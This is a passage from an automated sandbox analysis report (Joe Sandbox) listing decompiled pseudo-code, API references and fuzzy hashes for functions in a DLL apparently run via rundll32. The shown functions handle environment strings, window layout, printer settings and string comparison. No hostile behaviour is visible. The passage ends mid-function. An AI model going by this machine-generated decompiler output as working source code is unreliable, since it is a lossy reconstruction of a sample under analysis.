                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Info$ByteCharMultiWide_strlen
                                                                        • String ID:
                                                                        • API String ID: 1335377746-0
                                                                        • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                        • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001666B Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1001666B() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t24;
				long _t28;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1004f700; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(__eflags != 0) {
						__eflags = _t7 - _t38;
						if(_t7 == _t38) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							__eflags = _t37 - _t29;
							if(_t37 == _t29) {
								L20:
								return 0;
							}
							__eflags =  *_t37 - _t29;
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E100107B6(_t8 - _t37 + 1);
								__eflags = _t34 - _t29;
								if(_t34 != _t29) {
									E10011440(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t29;
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t29;
							} while ( *_t8 != _t29);
							goto L25;
						}
						__eflags = _t7 - _t29;
						if(_t7 == _t29) {
							goto L21;
						}
						goto L20;
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E100107B6(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
									_t52 = _t24;
									if(_t24 == 0) {
										_push(_v8);
										E100107C8(_t29, WideCharToMultiByte, _t36, _t52);
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					_t28 = GetLastError();
					__eflags = _t28 - 0x78;
					if(_t28 != 0x78) {
						_t7 =  *0x1004f700; // 0x1
					} else {
						_t7 = _t38;
						 *0x1004f700 = _t7;
					}
					goto L6;
				} else {
					 *0x1004f700 = 1;
					goto L7;
				}
			}






















                                                                        0x1001666d
                                                                        0x1001667c
                                                                        0x1001667e
                                                                        0x10016684
                                                                        0x10016685
                                                                        0x100166b4
                                                                        0x100166b4
                                                                        0x100166b7
                                                                        0x10016736
                                                                        0x10016738
                                                                        0x10016742
                                                                        0x10016742
                                                                        0x10016748
                                                                        0x1001674a
                                                                        0x1001674c
                                                                        0x1001673e
                                                                        0x00000000
                                                                        0x1001673e
                                                                        0x1001674e
                                                                        0x10016750
                                                                        0x1001675c
                                                                        0x1001675f
                                                                        0x10016767
                                                                        0x10016769
                                                                        0x1001676c
                                                                        0x10016775
                                                                        0x1001676e
                                                                        0x1001676e
                                                                        0x1001676e
                                                                        0x1001677e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016752
                                                                        0x10016752
                                                                        0x10016752
                                                                        0x10016752
                                                                        0x10016753
                                                                        0x10016753
                                                                        0x10016757
                                                                        0x10016758
                                                                        0x10016758
                                                                        0x00000000
                                                                        0x10016752
                                                                        0x1001673a
                                                                        0x1001673c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001673c
                                                                        0x100166b9
                                                                        0x100166bb
                                                                        0x100166c5
                                                                        0x100166c8
                                                                        0x100166ca
                                                                        0x100166da
                                                                        0x100166e8
                                                                        0x100166ed
                                                                        0x100166f3
                                                                        0x100166f7
                                                                        0x100166fa
                                                                        0x10016702
                                                                        0x10016706
                                                                        0x10016713
                                                                        0x10016715
                                                                        0x10016717
                                                                        0x10016719
                                                                        0x1001671d
                                                                        0x10016723
                                                                        0x10016723
                                                                        0x10016727
                                                                        0x10016727
                                                                        0x10016706
                                                                        0x1001672c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100166cc
                                                                        0x100166cc
                                                                        0x100166cc
                                                                        0x100166cc
                                                                        0x100166ce
                                                                        0x100166d3
                                                                        0x100166d5
                                                                        0x00000000
                                                                        0x100166cc
                                                                        0x100166bf
                                                                        0x100166c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100166c3
                                                                        0x10016689
                                                                        0x1001668d
                                                                        0x1001669b
                                                                        0x100166a1
                                                                        0x100166a4
                                                                        0x100166af
                                                                        0x100166a6
                                                                        0x100166a6
                                                                        0x100166a8
                                                                        0x100166a8
                                                                        0x00000000
                                                                        0x1001668f
                                                                        0x1001668f
                                                                        0x00000000
                                                                        0x1001668f

                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                        • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                        • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 883850110-0
                                                                        • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                        • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022499 Relevance: 12.1, APIs: 8, Instructions: 124windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed short _t63;
				void* _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x1c));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t63 = GetDlgCtrlID(_t91);
					_push(_t91);
					_t87 = _t63 & 0x0000ffff;
					_t64 = E10022115();
					if(_t87 != _a12) {
						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
							SendMessageA(_t91, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t62 = E100220EE(_t92, _v8);
						if(_a24 == 2) {
							_t85 = _a20;
							_v36.left = _v36.left +  *_t85;
							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
						}
						if((_a17 & 0x00000080) == 0) {
							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
							_t62 = E10020D81( &_v40, _v8,  &_v36);
						}
					}
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}



















                                                                        0x100224a8
                                                                        0x100224ae
                                                                        0x100224b1
                                                                        0x100224b4
                                                                        0x100224b7
                                                                        0x100224ba
                                                                        0x100224cc
                                                                        0x100224bc
                                                                        0x100224bf
                                                                        0x100224c0
                                                                        0x100224c1
                                                                        0x100224c2
                                                                        0x100224c2
                                                                        0x100224d5
                                                                        0x100224dd
                                                                        0x100224e0
                                                                        0x100224ef
                                                                        0x100224e2
                                                                        0x100224ea
                                                                        0x100224ea
                                                                        0x100224f6
                                                                        0x10022542
                                                                        0x10022542
                                                                        0x10022546
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022501
                                                                        0x10022507
                                                                        0x10022508
                                                                        0x1002250b
                                                                        0x10022513
                                                                        0x1002251d
                                                                        0x10022533
                                                                        0x10022533
                                                                        0x10022515
                                                                        0x10022515
                                                                        0x10022515
                                                                        0x1002253c
                                                                        0x1002253c
                                                                        0x1002254c
                                                                        0x1002257b
                                                                        0x10022585
                                                                        0x1002258e
                                                                        0x10022590
                                                                        0x10022595
                                                                        0x1002259b
                                                                        0x100225a1
                                                                        0x100225a7
                                                                        0x100225a7
                                                                        0x100225ae
                                                                        0x100225b9
                                                                        0x100225c7
                                                                        0x100225c7
                                                                        0x100225ae
                                                                        0x100225cf
                                                                        0x100225d4
                                                                        0x100225d4
                                                                        0x1002254e
                                                                        0x10022551
                                                                        0x10022562
                                                                        0x10022568
                                                                        0x1002256e
                                                                        0x10022571
                                                                        0x10022573
                                                                        0x10022553
                                                                        0x1002255a
                                                                        0x1002255a
                                                                        0x10022551
                                                                        0x100225de

                                                                        APIs
                                                                        • GetClientRect.USER32 ref: 100224CC
                                                                        • BeginDeferWindowPos.USER32(00000008), ref: 100224E4
                                                                        • GetTopWindow.USER32(?), ref: 100224F6
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 10022501
                                                                        • SendMessageA.USER32 ref: 10022533
                                                                        • GetWindow.USER32(00000000,00000002), ref: 1002253C
                                                                        • CopyRect.USER32 ref: 1002255A
                                                                        • EndDeferWindowPos.USER32(00000000), ref: 100225D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1228040700-0
                                                                        • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                        • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002535C Relevance: 12.1, APIs: 8, Instructions: 81stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				short _v528;
				short _v1048;
				short _v1568;
				intOrPtr _t18;
				int _t20;
				int _t21;
				void* _t23;
				char* _t32;
				int _t37;
				char* _t42;
				void* _t47;
				void* _t49;

				_t18 =  *0x1004c470; // 0x1bfbe703
				_t42 = _a4;
				_v8 = _t18;
				if(lstrcmpiA(_t42, _a8) == 0) {
					_t20 = GetSystemMetrics(0x2a);
					if(_t20 != 0) {
						_t21 = lstrlenA(_t42);
						if(_t21 != lstrlenA(_a8)) {
							L13:
							_t23 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
							_t32 = _t42;
							if( *_t42 == 0) {
								L10:
								_t23 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
									_t47 = _t47 + 2;
									if( *_t32 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
					} else {
						_t23 = _t20 + 1;
					}
				} else {
					_t23 = 0;
				}
				return E100117AE(_t23, _v8);
			}
















                                                                        0x10025365
                                                                        0x1002536e
                                                                        0x10025372
                                                                        0x1002537d
                                                                        0x10025388
                                                                        0x10025390
                                                                        0x100253a1
                                                                        0x100253ac
                                                                        0x10025434
                                                                        0x10025434
                                                                        0x100253b2
                                                                        0x100253be
                                                                        0x100253cd
                                                                        0x100253dc
                                                                        0x100253ed
                                                                        0x100253f2
                                                                        0x100253f4
                                                                        0x10025422
                                                                        0x10025424
                                                                        0x100253f6
                                                                        0x100253f6
                                                                        0x100253f8
                                                                        0x10025416
                                                                        0x10025420
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025420
                                                                        0x00000000
                                                                        0x100253f8
                                                                        0x100253f4
                                                                        0x10025425
                                                                        0x10025392
                                                                        0x10025392
                                                                        0x10025392
                                                                        0x1002537f
                                                                        0x1002537f
                                                                        0x1002537f
                                                                        0x10025431

                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        • GetSystemMetrics.USER32 ref: 10025388
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystemlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2335526769-0
                                                                        • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                        • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001F60C Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E1001F60C(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E10029C1B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10029C1B( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                        0x1001f60f
                                                                        0x1001f611
                                                                        0x1001f613
                                                                        0x1001f61b
                                                                        0x1001f635
                                                                        0x1001f63d
                                                                        0x1001f647
                                                                        0x1001f64e
                                                                        0x1001f650
                                                                        0x1001f655
                                                                        0x1001f658
                                                                        0x1001f658
                                                                        0x1001f66f
                                                                        0x1001f676
                                                                        0x1001f68e
                                                                        0x1001f693
                                                                        0x1001f698
                                                                        0x1001f698
                                                                        0x1001f69e
                                                                        0x1001f69e
                                                                        0x1001f64e
                                                                        0x1001f6a3
                                                                        0x1001f6a7

                                                                        APIs
                                                                        • GlobalLock.KERNEL32 ref: 1001F629
                                                                        • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                        • GlobalLock.KERNEL32 ref: 1001F679
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                          • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                          • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                          • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                        • String ID:
                                                                        • API String ID: 168474834-0
                                                                        • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                        • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100074F2 Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E100074F2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011BF0(0x1003a548, _t239);
				_t132 =  *0x1004c470; // 0x1bfbe703
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E100243B2();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F77E(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10006AEC(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
